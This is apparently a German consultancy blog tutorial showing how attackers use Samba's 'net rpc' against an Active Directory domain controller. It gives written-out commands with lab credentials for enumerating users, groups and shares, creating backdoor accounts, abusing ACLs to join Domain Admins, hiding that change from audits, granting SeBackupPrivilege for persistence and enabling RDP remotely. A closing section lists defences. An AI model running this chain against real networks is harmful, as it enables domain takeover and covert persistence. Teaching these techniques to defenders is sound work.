Scroll to top
    Zurück zum Blog
    Cybersecurity

    Active Directory Enumeration mit Net RPC Vollständiges Praxis-Tutorial

    Schritt für Schritt: So lesen Angreifer dein gesamtes Active Directory aus – mit einem einzigen Linux-Tool.

    11.04.2026 10 min Lesezeit
    Active Directory Enumeration mit Net RPC – Hero

    Was ist Net RPC?

    Net RPC ist Teil der Samba-Suite auf Linux und erlaubt die Kommunikation mit Windows-Systemen über das SMB/RPC-Protokoll. Es gibt einer Linux-Maschine die Fähigkeit, mit Windows Domain Controllern zu sprechen und administrative Operationen durchzuführen.

    Domain-Informationen abrufen
    Benutzer & Gruppen auflisten
    Shares identifizieren
    Privilegien verwalten
    Registry lesen/schreiben
    Passwörter ändern

    Der große Vorteil für Angreifer: Funktioniert oft schon mit einfachen Domain-User-Credentials – ohne Admin-Rechte.

    Voraussetzungen

    Linux-System

    z.B. Kali Linux mit Samba-Tools

    Netzwerkzugriff

    Verbindung zum Zielsystem/DC

    Credentials

    Benutzername + Passwort (optional)

    1

    Benutzer der Domain auflisten

    Der erste Schritt jeder AD-Reconnaissance: Alle Domain-Benutzer auflisten. Das Ergebnis zeigt Service Accounts, potenzielle Zielkonten und den kritischen krbtgt-Account.

    User Enumeration
    $net rpc user -U ignite.local/raj%'Password@1' -S 192.168.1.11
    Net RPC User Enumeration – Alle Domain-Benutzer

    Angreifer nutzen das für: Password Spraying, Brute Force, Identifikation von Admin-Accounts und Golden Ticket Attacks über den krbtgt-Hash.

    2

    Neuen Domain-Benutzer anlegen

    Mit Admin-Credentials lässt sich ein Backdoor-Account anlegen, der normale Remediation überlebt.

    Add User
    $net rpc user add kinjal 'Password@1' -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
    Net RPC – Neuen Domain User anlegen
    3

    Domain-Benutzer löschen

    Backdoor-Accounts nach Einsatz wieder entfernen – oder gezielt Accounts sperren für Sabotage.

    Delete User
    $net rpc user delete kinjal -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
    Net RPC – Domain User löschen
    4

    Benutzerinformationen abfragen

    Gruppenmitgliedschaften pro User abfragen – Accounts in Domain Admins, Backup Operators oder DnsAdmins werden sofort zu High-Priority-Zielen.

    User Info
    $net rpc user info sanjeet -U ignite.local/raj%'Password@1' -S 192.168.1.11
    Net RPC – Benutzerinformationen abfragen
    5

    Passwort ändern (ACL-Missbrauch)

    Wenn ForceChangePassword-Rechte fehlkonfiguriert sind, kann ein Standard-User fremde Passwörter zurücksetzen – ohne Admin-Rechte.

    Change Password
    $net rpc user password yashika Password@987 -U ignite.local/raj%'Password@1' -S 192.168.1.11
    Net RPC – Passwort über ACL-Missbrauch ändern

    Kritisch: ACL-Fehlkonfigurationen dieser Art gehören zu den häufigsten Schwachstellen in realen AD-Umgebungen.

    6

    Alle Domain-Gruppen auflisten

    Der gesamte Gruppen-Katalog in einer Abfrage: Domain Admins, Enterprise Admins, Schema Admins, DnsAdmins, Backup Operators – die komplette Privilege Attack Surface.

    Group Enumeration
    $net rpc group -U ignite.local/raj%'Password@1' -S 192.168.1.11
    Net RPC – Alle Domain Gruppen auflisten
    7

    Gruppen erstellen & löschen

    Angreifer können getarnte Gruppen erstellen, um Berechtigungen unauffällig zu vergeben.

    Add Group
    $net rpc group add sales -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
    Net RPC – Gruppe erstellen
    Delete Group
    $net rpc group delete sales -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
    Net RPC – Gruppe löschen
    8

    Domain Admins – Mitglieder auflisten

    Die kritischste Abfrage: Wer hat Domain-Admin-Rechte? Jeder Account hier ist ein direktes Ziel für Privilege Escalation.

    Domain Admins
    $net rpc group members "Domain Admins" -U ignite.local/raj%'Password@1' -S 192.168.1.11
    Net RPC – Domain Admins Mitglieder
    9

    ACL-Abuse: Selbst zum Domain Admin machen

    Durch fehlkonfigurierte AddMember-ACLs kann sich ein Standard-User selbst zum Domain Admin machen – und danach wieder entfernen, um Spuren zu verwischen.

    Add to Domain Admins
    $net rpc group addmem "Domain Admins" raj -U ignite.local/raj%'Password@1' -S 192.168.1.11
    Net RPC – Sich selbst zum Domain Admin machen
    Remove from Domain Admins
    $net rpc group delmem "Domain Admins" raj -U ignite.local/raj%'Password@1' -S 192.168.1.11
    Net RPC – Sich selbst aus Domain Admins entfernen

    OPSEC-Trick: Sich selbst hinzufügen, Zugriff sichern, dann wieder entfernen – viele Organisationen auditieren nur den aktuellen Mitgliederstand, nicht historische Änderungen.

    10

    Netzwerkfreigaben anzeigen

    ADMIN$, C$, SYSVOL, NETLOGON – jede Freigabe ist ein potenzielles Einfallstor. SYSVOL enthält historisch GPP-Dateien mit reversibel verschlüsselten Passwörtern (MS14-025).

    Share Enumeration
    $net rpc share -U ignite.local/raj%'Password@1' -S 192.168.1.11
    Net RPC – Netzwerkfreigaben anzeigen
    11

    Windows-Privilegien enumerieren

    SeBackupPrivilege, SeDebugPrivilege, SeImpersonatePrivilege – diese Privilegien sind Domain-Admin-Äquivalente und ermöglichen Credential Dumps, Token Impersonation und Rootkit-Installation.

    Privilege Enumeration
    $net rpc rights list -U ignite.local/raj%'Password@1' -S 192.168.1.11
    Net RPC – Windows Privilegien auflisten
    Grant Privilege
    $net rpc rights grant kinjal SeBackupPrivilege -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
    Net RPC – Privilege an User vergeben

    Stealth-Persistenz: Ein Backdoor-Account mit SeBackupPrivilege ist ein Domain-Admin-Äquivalent, taucht aber nie in der Domain-Admins-Gruppe auf.

    12

    Remote Registry – RDP aktivieren

    Über Remote Registry lassen sich SAM, SECURITY und SYSTEM-Hives lesen – und RDP auf dem Domain Controller aktivieren.

    Registry Enumeration
    $net rpc registry enumerate 'HKLM' -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
    Net RPC – Registry Hive Keys auflisten
    Check RDP Status
    $net rpc registry getvalue 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' 'fDenyTSConnections' -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
    Net RPC – RDP Status prüfen
    Enable RDP
    $net rpc registry setvalue 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' 'fDenyTSConnections' dword '0' -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
    Net RPC – RDP auf Domain Controller aktivieren

    Game Over: Backdoor-Account + RDP auf dem DC = vollständiger, persistenter, interaktiver Zugriff auf das privilegierteste System im Netzwerk.

    Hinweis: Patchen auf eigene Gefahr

    Die hier gezeigten Befehle und Konfigurationen werden auf eigenes Risiko ausgeführt. Ein falscher Befehl kann Systeme destabilisieren, Daten beschädigen oder Dienste unerreichbar machen. Wenn ihr unsicher seid, was ihr tut, kontaktiert lieber einen erfahrenen Administrator oder unsere Wasacon-Experten – wir helfen schnell und professionell.

    Schutzmaßnahmen

    14-Zeichen-Passwörter + MFA

    Für alle privilegierten Accounts

    Protected Users Group

    Credential Caching & Delegation verhindern

    krbtgt-Rotation

    Zweimal jährlich rotieren gegen Golden Tickets

    ACL-Audits

    BloodHound/PingCastle quartalsweise einsetzen

    JIT-Privileged Access

    Domain Admins auf Minimum beschränken

    Privilegien auditieren

    SeBackup/SeDebug als DA-Äquivalent behandeln

    SYSVOL scannen

    GPP cPassword-Felder sofort entfernen

    RDP auf DCs deaktivieren

    NLA erzwingen, auf Management-IPs beschränken

    Remote Registry deaktivieren

    Auf DCs standardmäßig abschalten

    SIEM-Monitoring

    Event IDs 4720, 4726, 4728, 4732, 4657 überwachen

    NDR/EDR einsetzen

    Defender for Identity oder äquivalente Lösung

    Honeypot-Accounts

    Fake-DA-Accounts als Frühwarnsystem

    Fazit

    Net RPC ist kein „Hacker-Tool" im klassischen Sinne – sondern ein legitimes Admin-Tool, das in den falschen Händen zur kompletten Netzwerk-Karte wird. Die demonstrierten Operationen bilden eine vollständige Angriffskette: Von der initialen Reconnaissance über Privilege Escalation bis zur Persistenz.

    Key Takeaway: Die Kompromittierung eines einzigen Standard-Benutzerkontos kann zur vollständigen Domain-Übernahme führen – wenn fehlkonfigurierte ACLs, übermäßige Privilegien oder schwaches Monitoring vorhanden sind.

    Ist dein Active Directory sicher?

    Wir prüfen deine AD-Konfiguration auf genau diese Schwachstellen – bevor es ein Angreifer tut.

    Häufig gestellte Fragen

    Diskussion

    0 Beiträge

    Lade Kommentare …
    Neuer Kommentar
    0/2000

    E-Mail wird nur zur Verifizierung verwendet, nicht veröffentlicht. Beiträge werden manuell geprüft.

    IT-Budget Quick-Check

    Wie viel sollte Ihr Unternehmen jährlich in IT investieren?

    Risiko-Level: Mittel · Multiplikator: 1.2×

    Richtwerte auf Basis von BSI/NIST/ENISA-Branchenbenchmarks. Keine verbindliche Empfehlung.

    Das könnte Sie auch interessieren

    Haftungsausschluss: Die auf Wasacon bereitgestellten Inhalte dienen nur zu Informationszwecken. Wir garantieren nicht die Qualität, Genauigkeit oder Vollständigkeit der Informationen aus Drittquellen.

    Sind Zugangsdaten Ihres Unternehmens bereits im Umlauf?

    Wir prüfen Ihre Domain kostenlos gegen bekannte Infostealer- und Leak-Datenbanken – vertraulich und unverbindlich.

    Bekannt aus

    Wasa Consult, Data Recovery Service, Heinsberg, Nordrhein-Westfalen